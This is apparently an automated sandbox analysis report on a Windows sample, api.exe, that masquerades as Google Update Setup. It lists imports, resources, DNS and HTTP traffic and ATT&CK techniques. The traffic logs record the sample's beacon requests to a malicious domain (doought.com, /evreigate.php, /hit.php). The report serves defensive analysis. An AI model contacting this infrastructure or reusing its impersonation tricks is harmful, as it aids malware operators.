RT_STRING	0x1656c8	0x19c	data	Dutch	Netherlands
RT_STRING	0x165864	0x16c	data	Norwegian	Norway
RT_STRING	0x1659d0	0x17c	data	Polish	Poland
RT_STRING	0x165b4c	0x14a	data	Portuguese	Brazil
RT_STRING	0x165c98	0x1b2	data	Romanian	Romania
RT_STRING	0x165e4c	0x182	data	Russian	Russia
RT_STRING	0x165fd0	0x188	data	Croatian	Croatia
RT_STRING	0x166158	0x16c	data	Slovak	Slovakia
RT_STRING	0x1662c4	0x18c	data	Swedish	Sweden
RT_STRING	0x166450	0x146	data	Thai	Thailand
RT_STRING	0x166598	0x146	data	Turkish	Turkey
RT_STRING	0x1666e0	0x118	data	Urdu	Pakistan
RT_STRING	0x1666e0	0x118	data	Urdu	India
RT_STRING	0x1667f8	0x164	data	Indonesian	Indonesia
RT_STRING	0x16695c	0x15a	data	Ukrainian	Ukrain
RT_STRING	0x166ab8	0x1a8	data	Slovenian	Slovenia
RT_STRING	0x166c60	0x138	data	Estonian	Estonia
RT_STRING	0x166d98	0x1c4	data	Latvian	Lativa
RT_STRING	0x166f5c	0x174	data	Lithuanian	Lithuania
RT_STRING	0x1670d0	0x124	data	Farsi	Iran
RT_STRING	0x1670d0	0x124	data	Farsi	Afganistan
RT_STRING	0x1670d0	0x124	data	Farsi	Tajikistan
RT_STRING	0x1670d0	0x124	data	Farsi	Uzbekistan
RT_STRING	0x1671f4	0x144	data	Vietnamese	Vietnam
RT_STRING	0x167338	0x128	data	Hindi	India
RT_STRING	0x167460	0x148	data	Malay	Malaysia
RT_STRING	0x1675a8	0x15e	data	Swahili	Kenya
RT_STRING	0x1675a8	0x15e	data	Swahili	Mozambiq
RT_STRING	0x167708	0x122	data	Bengali	India
RT_STRING	0x16782c	0x13e	data	Gujarati	India
RT_STRING	0x16796c	0x13a	data	Tamil	India
RT_STRING	0x16796c	0x13a	data	Tamil	Sri Lanka
RT_STRING	0x167aa8	0x140	data	Telugu	India
RT_STRING	0x167be8	0x142	data	Kannada	Kanada
RT_STRING	0x167d2c	0x186	data	Malayalam	India
RT_STRING	0x167eb4	0x164	data	Marathi	India
RT_STRING	0x168018	0xdc	data	Amharic	Ethiopia
RT_STRING	0x1680f4	0x168	data	Filipino	Philippines
RT_STRING	0x16825c	0xba	data	Chinese	China
RT_STRING	0x168318	0x120	data	English	Great Britain
RT_STRING	0x168438	0x13e	data	Spanish	Mexico
RT_STRING	0x168578	0x174	data	Portuguese	Portugal
RT_STRING	0x1686ec	0x196	data
RT_STRING	0x168884	0x1aa	data	Serbian	Cyrillic
RT_GROUP_ICON	0x168a30	0x5a	data	English	United States
RT_VERSION	0x168a8c	0x32c	data	English	United States
RT_MANIFEST	0x168db8	0x48e	XML 1.0 document, ASCII text

Imports

DLL	Import
KERNEL32.dll	HeapAlloc, GetProcAddress, GetProcessHeap, FreeLibrary, IsBadReadPtr, CreateProcessA, Process32First, GetCurrentProcess, GetModuleHandleA, CreateToolhelp32Snapshot, Sleep, GetLastError, GetNativeSystemInfo, CloseHandle, ExitProcess, lstrcmpiA, ReadFile, WriteFile, GetTempPathA, CreateFileA, DeleteFileA, GetFileSize, HeapSize, GetConsoleCP, FlushFileBuffers, CreateFileW, LoadLibraryA, VirtualAlloc, VirtualFree, SetLastError, HeapFree, Process32Next, VirtualProtect, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetConsoleMode, SetFilePointerEx, GetFileType, HeapReAlloc, WriteConsoleW, GetStdHandle, GetModuleFileNameW, GetModuleHandleExW, LoadLibraryExW, RaiseException, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, CreateEventW, GetModuleHandleW, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, WideCharToMultiByte, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo
USER32.dll	wsprintfA
ADVAPI32.dll	RegCloseKey, RegQueryValueExA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegGetValueA
SHELL32.dll	ShellExecuteA
SHLWAPI.dll	StrStrIA
WINHTTP.dll	WinHttpCloseHandle, WinHttpSendRequest, WinHttpQueryDataAvailable, WinHttpOpenRequest, WinHttpReadData, WinHttpSetTimeouts, WinHttpOpen, WinHttpReceiveResponse, WinHttpConnect

Version Infos

Description	Data
LegalCopyright	Copyright 2018 Google LLC
InternalName	Google Update Setup
FileVersion	1.3.35.342
CompanyName	Google LLC
LanguageId	en
ProductName	Google Update
ProductVersion	1.3.35.342
FileDescription	Google Update Setup
OriginalFilename	GoogleUpdateSetup.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Arabic	Saudi Arabia
Bulgarian	Bulgaria
Catalan	Spain
Chinese	Taiwan
Czech	Czech Republic
Danish	Denmark
German	Germany
Greek	Greece
Finnish	Finland
French	France
Hebrew	Israel
Hungarian	Hungary
Icelandic	Iceland
Italian	Italy
Japanese	Japan
Korean	North Korea
Korean	South Korea
Dutch	Netherlands
Norwegian	Norway
Polish	Poland
Portuguese	Brazil
Romanian	Romania
Russian	Russia
Croatian	Croatia
Slovak	Slovakia
Swedish	Sweden
Thai	Thailand
Turkish	Turkey
Urdu	Pakistan
Urdu	India
Indonesian	Indonesia
Ukrainian	Ukrain
Slovenian	Slovenia
Estonian	Estonia
Latvian	Lativa
Lithuanian	Lithuania
Farsi	Iran
Farsi	Afganistan
Farsi	Tajikistan
Farsi	Uzbekistan
Vietnamese	Vietnam
Malay	Malaysia
Swahili	Kenya
Swahili	Mozambiq
Tamil	Sri Lanka
Kannada	Kanada
Amharic	Ethiopia
Filipino	Philippines
Chinese	China
English	Great Britain
Spanish	Mexico
Portuguese	Portugal
Serbian	Cyrillic

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/19/21-12:35:59.641669	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49732	172.67.182.193	192.168.2.4
03/19/21-12:35:59.756694	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49732	172.67.182.193	192.168.2.4

Network Port Distribution

Total Packets: 46
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 19, 2021 12:41:50.123013020 CET	49747	80	192.168.2.4	104.21.18.167
Mar 19, 2021 12:41:50.166119099 CET	80	49747	104.21.18.167	192.168.2.4
Mar 19, 2021 12:41:50.166275024 CET	49747	80	192.168.2.4	104.21.18.167
Mar 19, 2021 12:41:50.167229891 CET	49747	80	192.168.2.4	104.21.18.167
Mar 19, 2021 12:41:50.208826065 CET	80	49747	104.21.18.167	192.168.2.4
Mar 19, 2021 12:41:50.219945908 CET	80	49747	104.21.18.167	192.168.2.4
Mar 19, 2021 12:41:50.235914946 CET	49747	80	192.168.2.4	104.21.18.167
Mar 19, 2021 12:41:50.277554035 CET	80	49747	104.21.18.167	192.168.2.4
Mar 19, 2021 12:41:50.286350965 CET	80	49747	104.21.18.167	192.168.2.4
Mar 19, 2021 12:41:50.340141058 CET	49747	80	192.168.2.4	104.21.18.167
Mar 19, 2021 12:42:00.154618025 CET	49747	80	192.168.2.4	104.21.18.167

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 19, 2021 12:41:42.849868059 CET	55854	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:42.899146080 CET	53	55854	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:43.327034950 CET	64549	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:43.384898901 CET	53	64549	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:44.534482956 CET	63153	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:44.584237099 CET	53	63153	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:48.546674967 CET	52991	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:48.596236944 CET	53	52991	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:49.550297022 CET	53700	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:49.600048065 CET	53	53700	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:50.013761044 CET	51726	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:50.077419043 CET	53	51726	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:56.323702097 CET	56794	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:56.376306057 CET	53	56794	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:57.294467926 CET	56534	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:57.346875906 CET	53	56534	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:57.534070969 CET	56627	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:57.586289883 CET	53	56627	8.8.8.8	192.168.2.4
Mar 19, 2021 12:41:59.086359024 CET	56621	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:41:59.146933079 CET	53	56621	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:00.571120024 CET	63116	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:00.623409033 CET	53	63116	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:01.373596907 CET	64078	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:01.423741102 CET	53	64078	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:02.602166891 CET	64801	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:02.654356956 CET	53	64801	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:03.941096067 CET	61721	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:03.993263960 CET	53	61721	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:07.002767086 CET	51255	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:07.060898066 CET	53	51255	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:07.884759903 CET	61522	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:07.937033892 CET	53	61522	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:12.121313095 CET	52337	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:12.171473026 CET	53	52337	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:12.323532104 CET	55046	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:12.372864008 CET	53	55046	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:12.919662952 CET	49612	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:12.973860025 CET	53	49612	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:17.952696085 CET	49285	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:18.002171040 CET	53	49285	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:19.130839109 CET	50601	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:19.180336952 CET	53	50601	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:20.286911011 CET	60875	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:20.336321115 CET	53	60875	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:21.449606895 CET	56448	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:21.499216080 CET	53	56448	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:28.631556988 CET	59172	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:28.734754086 CET	53	59172	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:29.295288086 CET	62420	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:29.422442913 CET	53	62420	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:29.853671074 CET	60579	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:29.947283983 CET	53	60579	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:29.974452972 CET	50183	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:30.049989939 CET	53	50183	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:30.399065971 CET	61531	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:30.456696033 CET	53	61531	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:30.980238914 CET	49228	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:31.038223028 CET	53	49228	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:31.554480076 CET	59794	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:31.612416983 CET	53	59794	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:32.139904976 CET	55916	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:32.189273119 CET	53	55916	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:33.435105085 CET	52752	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:33.503179073 CET	53	52752	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:34.325062990 CET	60542	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:34.386035919 CET	53	60542	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:34.872929096 CET	60689	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:34.933021069 CET	53	60689	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:38.843983889 CET	64206	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:38.905520916 CET	53	64206	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:47.425586939 CET	50904	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:47.477922916 CET	53	50904	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:47.596848011 CET	57525	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:47.668210983 CET	53	57525	8.8.8.8	192.168.2.4
Mar 19, 2021 12:42:50.328815937 CET	53814	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:42:50.388324022 CET	53	53814	8.8.8.8	192.168.2.4
Mar 19, 2021 12:43:21.109225035 CET	53418	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:43:21.158648014 CET	53	53418	8.8.8.8	192.168.2.4
Mar 19, 2021 12:43:22.850086927 CET	62833	53	192.168.2.4	8.8.8.8
Mar 19, 2021 12:43:22.910229921 CET	53	62833	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 19, 2021 12:41:50.013761044 CET	192.168.2.4	8.8.8.8	0xe685	Standard query (0)	doought.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 19, 2021 12:41:50.077419043 CET	8.8.8.8	192.168.2.4	0xe685	No error (0)	doought.com		104.21.18.167	A (IP address)	IN (0x0001)
Mar 19, 2021 12:41:50.077419043 CET	8.8.8.8	192.168.2.4	0xe685	No error (0)	doought.com		172.67.182.193	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

doought.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49747	104.21.18.167	80	C:\Users\user\Desktop\api.exe

Timestamp	kBytes transferred	Direction	Data
Mar 19, 2021 12:41:50.167229891 CET	937	OUT	GET /evreigate.php HTTP/1.1 Connection: Keep-Alive User-Agent: deus vult Host: doought.com
Mar 19, 2021 12:41:50.219945908 CET	938	IN	HTTP/1.1 403 Forbidden Date: Fri, 19 Mar 2021 11:41:50 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive Set-Cookie: __cfduid=dab42806a5e8315c577fe881f53752cb91616154110; expires=Sun, 18-Apr-21 11:41:50 GMT; path=/; domain=.doought.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT cf-request-id: 08ebe3c0f3000005dc33b2c000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cuBvQgOvOCcoQxCysfWzHKhHFs%2Fp78xWVaK4rvKKtgOmEHtHOKBjDl2O7WY7jHr1jYrYDAqW9cCOo7CCiQejtLFRa%2BuLXfvKotecNA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63266f14b91b05dc-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
Mar 19, 2021 12:41:50.235914946 CET	938	OUT	GET /hit.php?a=%7BbWW0uZJNBoadTsmEUEzhG%7Did=29 HTTP/1.1 Connection: Keep-Alive User-Agent: deus vult Host: doought.com
Mar 19, 2021 12:41:50.286350965 CET	939	IN	HTTP/1.1 403 Forbidden Date: Fri, 19 Mar 2021 11:41:50 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive Set-Cookie: __cfduid=dab42806a5e8315c577fe881f53752cb91616154110; expires=Sun, 18-Apr-21 11:41:50 GMT; path=/; domain=.doought.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT cf-request-id: 08ebe3c137000005dc87943000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f95WW97Bu%2Fq%2Bf6Wzvrc4we0eMt1olLT9aDPGEvGk%2Fcn38At2qhfps0fKix8P7ZGrW9Vz0BZLZrUs0Tkqh5EzhRLNAsHi0ORMJziVYQ%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63266f1529cd05dc-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

Code Manipulations

Statistics

Behavior

• api.exe
• WerFault.exe

Click to jump to process

System Behavior

Analysis Process: api.exe PID: 2588 Parent PID: 4832

General

Start time:	12:41:49
Start date:	19/03/2021
Path:	C:\Users\user\Desktop\api.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\api.exe'
Imagebase:	0xf20000
File size:	2071040 bytes
MD5 hash:	B63932CDE2143B739551FA5501394146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Show Windows behavior

General

Start time:	12:41:51
Start date:	19/03/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 712
Imagebase:	0xf30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Registry Activities

Key Created

Key Value Created

Disassembly

Code Analysis

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report api.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: api.exe PID: 2588 Parent PID: 4832